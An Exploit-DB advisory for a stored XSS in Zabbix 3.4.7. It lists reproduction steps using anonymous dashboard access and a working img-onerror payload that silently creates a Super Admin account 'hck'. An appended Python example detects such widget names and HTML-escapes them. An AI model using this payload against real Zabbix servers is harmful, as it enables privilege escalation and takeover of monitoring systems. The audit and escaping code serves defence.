Zabbix 3.4.7 – Stored XSS

  • Author: Radmil Gazizov
    Date: 2021-03-31
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49729/
  • # Exploit Title: Zabbix 3.4.7 - Stored XSS
    # Date: 30-03-2021
    # Exploit Author: Radmil Gazizov
    # Vendor Homepage: https://www.zabbix.com/
    # Software Link: https://www.zabbix.com/rn/rn3.4.7
    # Version: 3.4.7
    # Tested on: Linux
    
    # Reference - https://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt
    
    1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382)
    2- Create new dashboard
    3- Add a new widget => Type: Map navigation tree
    4- Paste into parameter "Name": <img src="https://www.exploit-db.com/exploits/49729/x" onerror="var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});">
    5- Click the "Add" button
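    The root cause above is a widget "Name" value that is stored and later rendered without output encoding, so an `onerror` handler on an injected `<img>` runs in the administrator's session (the payload posts to users.php with user_type 3, i.e. a Zabbix Super Admin). The added example below is not part of the advisory: it audits stored widget names for markup carrying an event handler and shows the context-aware escaping that would neutralise such a value; the sample names are constructed.

```python
import html
import re

# Constructed sample: widget names as they might be read from the dashboard
# widget table. The second entry mirrors the shape of the advisory's payload
# (an <img> whose onerror handler fires a request); the others are benign.
SAMPLE_WIDGET_NAMES = [
    "Core network map",
    '<img src="x" onerror="jQuery.post(\'users.php\',{form:\'Create+user\',user_type:3})">',
    "Site <A> - racks",   # looks like a tag but carries no handler
]

# An element opener plus an on*= attribute is the signature of this class of
# payload; a lone "<A>" in a human-typed name is not enough on its own.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")
EVENT_HANDLER_RE = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)


def is_suspicious_widget_name(name: str) -> bool:
    """True when a stored name contains markup with an inline event handler."""
    return bool(TAG_RE.search(name) and EVENT_HANDLER_RE.search(name))


def audit_widget_names(names):
    """Return the subset of stored names that should be reviewed and removed."""
    return [n for n in names if is_suspicious_widget_name(n)]


def render_widget_name(name: str) -> str:
    """The fix: HTML-encode the value in the context where it is emitted.

    After escaping, the browser sees literal text, never an <img> element,
    so no onerror handler can run regardless of what was stored.
    """
    return html.escape(name, quote=True)


if __name__ == "__main__":
    for name in audit_widget_names(SAMPLE_WIDGET_NAMES):
        print("SUSPICIOUS:", name)
        print("  rendered safely as:", render_widget_name(name))
```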